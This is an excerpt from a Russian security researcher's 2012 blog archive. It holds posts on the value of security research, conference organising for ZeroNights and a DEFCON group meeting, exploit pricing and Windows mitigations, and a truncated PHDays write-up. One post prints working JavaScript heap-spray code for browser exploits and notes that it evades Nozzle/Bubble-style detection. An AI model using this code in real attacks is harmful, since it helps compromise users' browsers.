<li><a href="http://www.linkedin.com/groups/DSEC-ERPScan-%D0%BD%D0%B0-Black-Hat-3189141.S.181404786">http://www.linkedin.com/groups/DSEC-ERPScan-%D0%BD%D0%B0-Black-Hat-3189141.S.181404786</a> (не для слабонервных)</li>
</ul>
<div>
Поток.<br />
<br />
В контексте этой истории - <a class="twitter-timeline-link" data-expanded-url="http://www.xakep.ru/post/59715/" dir="ltr" href="http://t.co/Bhbbw8Or" style="background-color: #f6f6f6; color: #0084b4; font-family: Arial, sans-serif; font-size: 14.399999618530273px; line-height: 18px; text-decoration: initial;" target="_blank" title="http://www.xakep.ru/post/59715/"><span class="js-display-url" style="background-color: #f6f6f6; color: #0084b4; font-family: Arial, sans-serif; font-size: 14.399999618530273px; line-height: 18px; text-decoration: initial;">xakep.ru/post/59715/</span><span style="color: #0084b4; font-family: Arial, sans-serif;"><span class="invisible" style="background-color: #f6f6f6; font-size: 0px; line-height: 0; line-height: 0;"></span></span><span class="tco-ellipsis" style="background-color: #f6f6f6; color: #0084b4; font-family: Arial, sans-serif; font-size: 14.399999618530273px; line-height: 18px; text-decoration: initial;"><span class="invisible" style="font-size: 0px; line-height: 0;"> </span></span></a> все это хорошо объяснимо. Для чего делаются исследования? Вот если ответить на этот вопрос, честно и беспристрастно, то станет понятно, что большинство ресерча бесполезно, ибо цели интересны узкому кругу лиц. Вообще ИБ индустрия - это узкий круг лиц, и рынок там - "натуральное хозяйство". ИБшники это кто, возьмем систему Тохи:<br />
<br />
1) Менеджеры ИБ в компаниях.<br />
2) Ресерчеры - баг-хантеры.<br />
3) Вендоры ИБ<br />
4) Регуляторы<br />
<br />
И что получается? Что система замкнута. Ресерчеры изображает из себя хакеров, находят XSS, хвастаются ею, создают повод, для того, что бы менеджер ИБ могу купить то, что произвел на свет вендор ИБ. А еще есть Регуляторы, которые тупо говорят: всем покупать и тратить деньги, иначе рынок умрет 8) В 90% рынка - это так (субъективное мнение). Это тупик. Провал. В итоге мы имеем тонны Г.Пиара от Ресерчеров, которые хотят куски котлет. Вендоров ИБ, которые встроились в систему. В итоге что же ресерчеры? Они тоже бывают разными, кто делает ресерч ради фана, кто ради ПР и бизнеса, кто ради реальной цели - взломать что-то. Так вот в последнем случае это хотя бы оправданный ресерч. Человек хочет что-то сломать, делает исследование, находит багу, методу, вектор атаки, ломает и приносит себе реальную выгоду. А ради фана? Смотри пример с электронными замками. Чувак получил фан, сгонял в Лас-Вегас, но на этом все. Пользу получили воры. Все остальные (разработчики, владельцы) только ущерб. ИМХО: полезность такой ресерч принес бы только бы только <b>в процессе разработки</b>.<br />
<br />
Вывод.<br />
<br />
ИБ-ресерч в отрыве от процесса разработки и эксплуатации - бесполезен. Да вы нашли 100 багов, ну 1000, ну и что? Их еще потом 1000 будет, после вас, другие то же найдут. Гонятся за цифрами или ПР-ом круто, но толку вселенной это не принесет. Актуальность некоторых ресерчей - то же большой вопрос. ИБ - индустрия, особенно в России (но на самом деле на западе примерно такая же идея, только чуть впереди по развитию) - жалкое зрелище, есть отдельные исключения, но в целом, все вместе - унылая ветка по срубанию бабла. До 200x года было веселее, тогда люди делали ресерч ради реального профита и угара, и это двигало всех совершенствовать защиту и развивать процессы, но теперь все застопорилось.<br />
<br />
Не претендую на правдивость всего сказанного или того, что я буду так думать через какое-то время, но уверен, что ИБ в отрыве от разработчиков, процессов и эксплуатации - просто махание шашкой. Консультанты, интеграторы, регуляторы - просто элементы системы иногда даже паразитические 8)</div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com4tag:blogger.com,1999:blog-4711612808026791519.post-64925380254544534422012-11-23T04:47:00.001-08:002012-11-23T04:47:11.194-08:00HeapSpray<div dir="ltr" style="text-align: left;" trbidi="on">
Мини блого-запись о хипспрее.<br /><br />
Забавно, но в Интернетах говорят о всяких Bubble и Nozzle, и в частности относительно FF и IE9. Я вот прочитав следующие блоги:<br />
<br />
https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/<br />
http://www.greyhathacker.net/?p=549<br />
<br />
... был убежден в эффективности данных методов и даже рассказывал об этом на воркшопе, но сегодня захотелось мне определить порог детектирования HeapSpray. И тут то я понял, что истинная причина того, почему все эти методы из блогов работают, не в том, что они добавляют рандомный код в начали строки и обманывают сложные алгоритмы, а в том, что там есть конкатенация в цикле. Другими словами не надо усложнять код и добавлять счетчик или не-ассемблерные инструкции и тд. Достаточно сделать конкатенацию! Все просто, не усложняйте себе жизнь ;)<br />
<br />
P.S. Прошу считать это за дополнение к воркшопу, где рассказывалось об методе Корелана. Теперь рабочий код для HeapSpray много проще (greyhathacker.net базовый вариант):<br />
<br />
<br />
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
var heap_chunks;</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
function heapSpray(rop,shellcode,nopsled)</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
{</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
var chunk_size, headersize, nopsled_len, code;</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
var i, codewithnum;</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
log.innerHTML+="<br><b>Stage 2. HeapSpraay...";</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
chunk_size = 0x40000;</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
headersize = 0x10;</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nopsled_len = chunk_size - (headersize + rop.length + shellcode.length);</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
while (nopsled.length < nopsled_len)</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nopsled += nopsled;</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nopsled = nopsled.substring(0, nopsled_len);</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
code = nopsled + rop + shellcode; </div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
heap_chunks = new Array();</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
for (i = 0 ; i < 1000 ; i++)</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
{</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
codewithnum = "HERE" + code;</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
heap_chunks[i] = codewithnum.substring(0, codewithnum.length);</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
}</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
}</div>
</li>
</ol>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com5tag:blogger.com,1999:blog-4711612808026791519.post-83064085658370152252012-10-12T09:07:00.000-07:002013-06-07T16:16:07.020-07:00ZeroNights 2012<div dir="ltr" style="text-align: left;" trbidi="on">
В преддверие <b>Zeronights Episode 0x02</b>, хотел бы поделится той работой что я проделал для этой конфы и мыслями по этому поводу. Инсайд.<br />
<div>
<br /></div>
<div>
Я конечно со-организатор, но что это значит? В основном то, что ты говоришь другим организаторам свое виденье того, что и как должно быть, слушаешь других или споришь с ними. В финале вы все дружно принимаете решение и делаете все по намеченному плану. Честно говоря, делать конфы - это ад. Неблагодарная работа. Ведь всем не угодишь, не то, что посетителям, но и даже своим коллегам. Было много спорных моментов, например о запуске этого самого второго эпизода в Москве, да и в других темах были споры, где у оргов мнение расходилось, но я не буду здесь писать об этом, я расскажу о практической части работы и том опыте, что я получил.</div>
<div>
<br />
<br /></div>
<div>
<b>CFP</b></div>
<div>
<br /></div>
<div>
Мне досталась роль админа панели. В прошлом году я тоже там был, но панель сильно изменилась. Если в прошлом году были известные личности со всего мира, которым мы рассылали заявки и ждали фидбека, то в этом году все было иначе. В прошлом году было немного тупо - отправил ты, значит, людям пачку текстовок и ждешь... ждешь... не динамично это. Потом не все отсылали вес вовремя, а кое-кто вообще забыл 8) Так что мне не понравилось делать это по мылу. В этом году CFP была 'online', прямо в гугл-доках. Каждый мог в своем столбике откомментить тот или иной доклад, поставить цветовую оценку. Красиво, наглядно и эффективно. Кто оценивал? Все те кто принимает участие в жизни DCG#7812. Кто откликнулся в группе (кстати не много, кто), кто захотел повлиять на список докладов, тот это мог сделать и сделал. Имена я называть не буду, кто хочет сам расколется ) Но в основном это всем нам знакомые имена, так сказать лучшие представители Российской белой сцены. Плюсы очевидны - живая дискуссия, каждый рецензент имеет опыт кто в чем, и поэтому и веб и бинарщина была оценена по достоинству проффи.<br />
<br />
Мы получили ~60 заявок. И в этот раз Россиян было много! Это радует, итак: патриотический момент, процент заявок от исследователей по географическому признаку (Fast Track не включен в статистику)!<br />
<br />
<br />
<ul style="text-align: left;">
<li>СНГ - 44%</li>
<li>Заграница - 56%</li>
</ul>
<br />
На самом деле эти показатели просто замечательные. Я горд за активность наших людей. это правильно. А теперь процент пробива: то же самое, но только по прошедшим докладам...<br />
<br />
<br />
<br />
<ul style="text-align: left;">
<li>СНГ - 49%</li>
<li>Заграница - 51% </li>
</ul>
<br />
Это говорит о том, что заявки в общей массе были примерно одинаковые, даже может отечественный контент был чуточку более качественными (по мнению комиссии). Думаю что это правильно, конфа родная, отечественная, и многие готовили что-то специально для неё. К сожалению новых лиц, среди русских заявок не так уж много. Это печально. С другой стороны - стабильно ;)<br />
<br />
<b>Воркшоп</b><br />
<br />
Теперь про мой контент. Собственно я решил попробовать силы в создании воркшопа. Воркшоп на тему разработки эксплойтов для Win7 под x32. С уклоном в сторону браузеров. На примере IE9. Будет пройден путь от простого BoF эксплойта, до сложного BoF эксплойта, который обходит DEP, ASLR, GS /safeSEH. При этом ASLR мы обойдем двумя способами (в том числе рассмотрим как можно использовать BoF для утечки адреса из ASLR модуля, с последующим построением ROP по утекшему базовому адресу). Кроме того мы коснемся Use-After-Free багов, их эксплуатации в той же среде и так же с частным примером того как "угонять" адреса для обхода ASLR. Это я к тому, что будет не просто банальное - "а теперь обходим ASLR, так как наш модуль скомпилирован без поддержки ASLR", хотя и этот кейс мы тоже рассмотрим. Кроме того мы поговорим про HeapSpray. Все это я ДОЛЖЕН уложить в 5 часов. Задача не простая. Я уже пробовал силы, с меньшим объемом информации в сентябре на встречи DCG - пошло туго, особенно если много народу 8( Поэтому базовые вопросы написания эксплойтов я буду не полностью разжевывать. Кстати, судя по всему, мой воркшоп будет на второй день конфы, а в первый день будет похожий воркшоп (4 часа) от <b>Рика Флореза</b> из Rapid7, там будет заточка на метасплойт и базовые вещи. Да... программа будет насыщенной... не знаю даже как я бы поступил... и на воршоп идти охота и доклады послушать..ппц, а еще же конкурсы...<br />
<br />
<b>Конкурс</b><br />
<b><br /></b>
В прошлом году я написал один левел для Zeronights Hack-Quesr, который делал ONsec, такой простой левел с AES-CBC. Его многие прошли, судя по врайтапам, что не плохо 8) В этом году мы с друзьями решили замутить небольшой хакквест. Он продет в рамках конференции. начнется в первый день.... и до победного конца. Это будет гонка. Первые два финалиста получат ценные призы от <span style="color: #0b5394;"><b>NOKIA</b></span>. Он не только на cекурити тематику, но и на смекалку 8) Первая часть вообще ни как не будет завязана на секурити. Мы хотели создать ПРОСТОЙ, но интересный хак-квест, который не сильно бы отвлекал от основной программы. Но в конце надо будет пописать сплойты, так что...<br />
<br />
Как вы понимаете, на конфе будет еще много чего интересного, например, что отметил бы лично я:<br />
<br />
Про воркшопы мы уже говорили, но их будет МНОГО и они будут крутыми, еще ДАЛЕКО не вся программа опубликована, но из того что уже доступно, кроме <b>Рика Флореза</b>, будет любопытный воркшоп про RFID - <a href="http://2012.zeronights.ru/workshop#salamatin-cumanov">http://2012.zeronights.ru/workshop#salamatin-cumanov</a> . Это точно стоит посетить, кроме того доклады про безопасность Авиа систем (<a href="http://2012.zeronights.ru/program#kostin">http://2012.zeronights.ru/program#kostin</a>) и Ruby (<a href="http://2012.zeronights.ru/program#joernchen">http://2012.zeronights.ru/program#joernchen</a>) вызывают у меня не поддельный интерес, я уже не говорю про то, что <b>Владимир Воронцов</b> с <b>Александром Головко</b> решили нам раскрыть 0дэй техники в своем докладе - <a href="http://2012.zeronights.ru/program#vorontsov-golovko">http://2012.zeronights.ru/program#vorontsov-golovko</a> . Интересным обещает быть и тема <b>Никиты</b> про безопасность NFC и EMV - <a href="http://2012.zeronights.ru/program#abdullin">http://2012.zeronights.ru/program#abdullin</a>. И это не все, на что я бы хотел попасть. Быть "оргом" утомительно и не всегда будет возможность бегать по докладам 8(( Но программа получилась просто отличной на мой взгляд. Это при том, что есть еще пачка докладов, которые не в паблике, и готовятся к публикации на сайте... там еще стока вкусного, надеюсь эти имена вам о чем то говорят: <b>Solar Designer</b>, <b>Алиса Esage</b>, <b>Никита Тараканов</b>... да, никаких соплей, только мясо! Никаких перс-данных и нытья про регуляторов и бумажки! Никаких дед-садовских тем в угоду пиджакам и грязного ПР на почве того, что массы не шарят в теме! Только ресерч, технологии, хитрые трюки и хаки, реальная защита и реальные атаки на то, чем мы пользуемся дома или на работе.<br />
<br />
(Патриотичненький пост получился... хммм...)<br />
<br /></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com3tag:blogger.com,1999:blog-4711612808026791519.post-18289978228137249342012-06-21T10:39:00.001-07:002012-06-21T11:18:04.975-07:00Стоимость эксплойта...<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Arial, Helvetica, sans-serif;">Прочитал тут новость: <a href="http://www.securitylab.ru/news/426076.php">http://www.securitylab.ru/news/426076.php</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Суть:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div style="text-align: left;">
<span style="font-family: Times, 'Times New Roman', serif;">"Некий <span style="background-color: white; font-size: 15px; text-align: -webkit-auto;">Джонатан Несс (Jonathan Ness), менеджер по информационной безопасности Trustworthy Computing (одно из подразделений Microsoft) заявил, что софтверный гигант разрабатывает методы уменьшения количества атак с использованием эксплойтов путем увеличения затрат, необходимых для обнаружения и использования уязвимостей.</span></span></div>
<div style="font-size: 15px; text-align: left;">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span></div>
<div style="font-size: 15px; text-align: left;">
<span style="font-family: Times, 'Times New Roman', serif;">...</span></div>
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span><br />
<br />
<div style="font-size: 15px; text-align: -webkit-auto;">
<span style="font-family: Times, 'Times New Roman', serif;">1. Увеличение количества инвестиций, необходимых для поиска опасных уязвимостей.</span></div>
<div style="font-size: 15px; text-align: -webkit-auto;">
<span style="font-family: Times, 'Times New Roman', serif;">2. Увеличение количества инвестиций, необходимых для написания функциональных и работоспособных эксплойтов.</span></div>
<div style="font-size: 15px; text-align: -webkit-auto;">
<span style="font-family: Times, 'Times New Roman', serif;">3. Сокращение возможности хакеров вернуть свои инвестиции."</span></div>
<div style="font-size: 15px; text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="font-size: 15px; text-align: -webkit-auto;">
<span style="font-family: Arial, Helvetica, sans-serif; text-align: left;">(с) SecurityLab</span>
</div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Как обычно - комментарии радуют 8) Но я вот поделюсь своими мыслями...</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">На самом деле Несс прав и более того, то о чем он говорит происходит последние лет 7-8. Печально, что читатели секлаба не видят разницы между "уязвимостью" и "эксплойтом". Ведь на самом деле большенство уязвимостей не стоят и гроша. Хотя затраты на ихз поиск могут реально что-то стоить. но вот готовый эксплойт уже реально стоит денег. Если прикинуть, что средняя цена эксплойта под ходовой продукт будет около 100.000$, то очевидно, что для повышения стоймости разработки этого эксплойта приведет к повышению его цены. Из чего складывается цена эксплойта для браузера или плагина к браузеру для win32 (как пример)?</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">1. Затраты на поиск узвимости V1</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 1.1 Разработка фаззера</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 1.2 Организация фаззинга (генерация данных, тестирование)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 1.3 Реверсинг и бинарный анализ</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 1.4 Анализ исходных кодов (если доступны)</span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">2. Захват контроля</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 2.1 Контроль EIP (ESP)<br /> 2.1.1 Обход safeSEH<br /> 2.1.2 Обход SEHOP</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 2.1.3 Обход /GS в стеке<br /> 2.1.4 Обход защиты кучи</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 2.2 Контроль над размещением шеллкода<br /> 2.2.1 Обход DEP (ROP/JIT Spray)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 2.2.2 Обход защит от HeapSpray (Nozzle/Bubble)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"> 2.3 Передача управления<br /> 2.3.1 Обход ASLR (эксплойт утечки адреса - V2 / Spray)<br />3. Выполнение произвольного кода<br /> 3.1 Обход песочницы (ring0 эксплойт V3 / escape эксплойт V4)<br /><br />В 2002 году не было пунктов 2.1.1-2.1.4, 2.2.1-2.2.2, 2.3.1 и 3.1. В 2007 году не было 2.1.2, 2.2.2,2.3.1. Очевидно, что сложность разработки эксплойтов возрастает, как и цены! Чудесный пример Сергея Глазунова - что бы захакать Хром ему понадобилось <b>14</b> мини-эксплойтов. В простейшем же случае вам нужно <b>2</b> нормальных эксплойта - под браузер или плагин + эксплойт для ринг0, что бы вырваться из песочницы. Это значит что финальная цена вырастает пропорционально. Не говоря уж и о том, что обход ASLR и DEP по прежнему часто задача творческая и требующая дополнительных усилий. Ровно неделю назад писал эксплойт под SAP 2008 года. Там был /GS и DEP и не было SEH для обхода /GS. Задача была решена, потому что тогда GS был слабенький ;) Сейчас тот же эксплойт под SAP 2010 года уже не написать так просто, мне лично в падлу 8) А вот под SAP 2005 года намного проще - там же /GS нету. Так что чем больше будут усложнятся механизмы защиты - тем дороже будет разработка. Ну это, как бы, очевидно. Зато вот финальная цена эксплойта будет определятся следующими показателями:<br /><br />1. Популярность продукта.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">2. Стабильность эксплойта</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">3. Статус 0Day. (0day дороже, 1day дешевле. Ваш Кэп)<br />4. Вектор применения (чем меньше нужно сделать "жертве" для срабатывания, тем лучше-дороже / чем легче доставить до цели - тем дороже.)<br />5. Время от запуска до срабатывания (чем меньше, тем лучше).<br />6. Насыщенность рынка<br /><br /><br />Отсюда, мне думается, что на пункт 1 производитель ни как не повлияет 8) На пункт 2 - легко, все тем mitigations что они придумывают, в этом деле легонечко помогают. Пункт 3 - могут косвенно, если сами будут искать баги или с помощью ZDI. Например поробуйте найти в windows7 stack BoF? Нету? Ага, Майкрософт уже давно все самое простое нафаззил и нашел и горе-хакерам осталось искать что-то менее тривиальное =) <br />4 пункт не очевиден, но в целом повлиять на него сложно не ухудшив юзабилити продукта, на что вендоры пойти не готовы. 5 - могут. И все это приведет к тому, что кол-во эксплойтов, стабильных и дешевых станет меньше, зато качественные и стабильные, будут стоить НАМНОГО дороже, чем сейчас, ведь на рынке их будет недостаток (пункт 6). Насколько </span><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">и как в таком будущем изменятся цены - я не знаю 8) Если сейчас средняя цена 100к$, то думаю в 2000 она была не такой, почти уверен, что в 10 раз ниже.... Что будет в 2020? Веселое время, однако 8)</span></div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com8tag:blogger.com,1999:blog-4711612808026791519.post-25121625149781755472012-06-13T07:37:00.002-07:002012-06-13T07:37:58.517-07:00Defcon встреча DCG#7812. Номер 10.<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Юбилейная</span><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> встреча нашей группы. </span><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Во-первых, она 10ая. </span><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">Во-вторых, нам ровно ГОД. Да-да, ровно год назад мы собрались первый раз. А помните как все начиналось - </span><a href="http://devteev.blogspot.com/2011/05/defcon.html" style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">http://devteev.blogspot.com/2011/05/defcon.html</a><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;"> </span><span style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">?</span><br />
<div style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
<br /></div>
<div style="font-family: Verdana; font-size: 12px; text-align: -webkit-auto;">
Что нас ждет 15-го Июня 2012 года в СПбГПУ в 19-00? Три доклада и одна дискуссионная панель, где может высказаться каждый!<div>
<div>
<br /></div>
<div>
<span style="color: #ebebeb;"><br /></span></div>
</div>
<b>1. OAuth и что с ним можно сделать</b> by Егор Хомяков<div>
<b>2.</b> <b>Целостность процессов ОС </b>by<b> </b>Кетов Дмитрий и Нестеров Кирилл</div>
<div>
<b>3. Взлом VMware vCenter за 60 секунд</b> by Александр Миноженко и /me</div>
<div>
<br /></div>
<div>
Дискуссионная панель: <b>Offensive Security - WTF?</b></div>
<div>
<br /></div>
<div>
Дискуссионная панель для всех страждущих общения и обмена опытом. Тема дня - разработка эксплойтов, продажа эксплойтов, тесты на проникновение, любительский взлом. Где граница между злом, добром, честностью и бизнесом? Откровения и признания! Тайны, интриги, расследования!</div>
<div>
<br /></div>
<div>
Let's fucking rock! Oi!Oi!Oi! и тд и тп 8)</div>
<div>
<br /></div>
<div>
P.S. Ах да, карта, адреса, явки: <a href="https://defcon-russia.ru/10.php">https://defcon-russia.ru/10.php</a></div>
</div>
<br class="Apple-interchange-newline" /></div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0tag:blogger.com,1999:blog-4711612808026791519.post-75482772008376178342012-06-02T14:44:00.000-07:002016-04-20T09:33:54.461-07:00PHDays. Write-up.<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal">
Раз я веду блог, то глупо было бы не написать о своих
впечатлениях, о таком громком мероприятии как <span lang="EN-US">PHDays</span>.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>До…</b><o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div style="text-align: justify;">
Событие обещало быть легендарным. В прошлом году именно <span lang="EN-US">PHDays</span><span lang="EN-US"> </span>сделало
первый шаг в сторону «техники» и «хака». Это был смелый шаг и он удался. В этом
году обещали уже и западных докладчиков с интересными темами, и целых два дня
угара. По взрослому уже. Что же, любой человек, который, так или иначе,
увлекается темой ИБ просто обязан был попытаться попасть туда. Мои коллеги (Саша Поляков <span lang="EN-US">aka</span> @<span lang="EN-US">sh</span>2<span lang="EN-US">kerr</span>,
Дмитрий Евдокимов <span lang="EN-US">aka</span> @<span lang="EN-US">evdokimovds</span><span lang="EN-US"> </span>и
Саша Миноженко <span lang="EN-US">aka</span> @<span lang="EN-US">al</span>3<span lang="EN-US">xmin</span>) уже были в программе как
докладчики или как участники <span lang="EN-US">CTF</span>.
А мне пришлось в последний момент готовить (опять же с Сашей Миноженко) доклад про
взлом <span lang="EN-US">VMware</span>. И, о счастье.
Нашлось ме<span lang="EN-US">c</span>то в секции <span lang="EN-US">FastTrack</span>. Так что один из вариантов
попасть на событие – быть прямым учаником, докладчиком или пройти отборные в <span lang="EN-US">CTF</span>. Второй вариант – быть
приглашенным. Как я понял, эта группа друзей и клиентов компании-организатора.
Поэтому вдвойне приятно, что они пригласили и наших коллег и всех тех, кто
занимается ИБ. На мероприятии я увидел почти всех знакомых мне деятелей ИБ! А это очень важный момент на таких мероприятиях 8) Более того, я познакомился с
теми, кого знал например только по Твиттеру или блогам. Это огромный плюс
организатору, ведь коммунити такой любви и внимания не забудет ;) К сожалению
надо признать, что всем остальным. Кому не посчастливилось быть либо
непосредственным участником программы либо приглашенным приходилось надеется на
открытию регистрацию с оставшимися местами. Это самый неприятный момент всего <span lang="EN-US">PHDays</span>, но оргов понять можно
– зал не резиновый, а вход бесплатный. Поэтому
раздача оставшихся мест напоминало выходку Дурова в день города. Говорят
даже получался эффект недоступности сервиса из-за наплыва желающих. В итоге за
8 минут все места были разобраны. Но надо сказать, что организаторы сделали еще
доп. регистрацию, так что, надеюсь, обиженных не оказалось. Кроме того, если
очень захотеть, то найти путь «проникновения» на конференцию не так уж сложно. Например,
я в первый день потерял совой бейдж и спокойно ходил без него. Охранник подошел
всего один раз, но мер не предпринял (достаточно добрый и приятный человек). <o:p></o:p></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Во-время…</b><o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
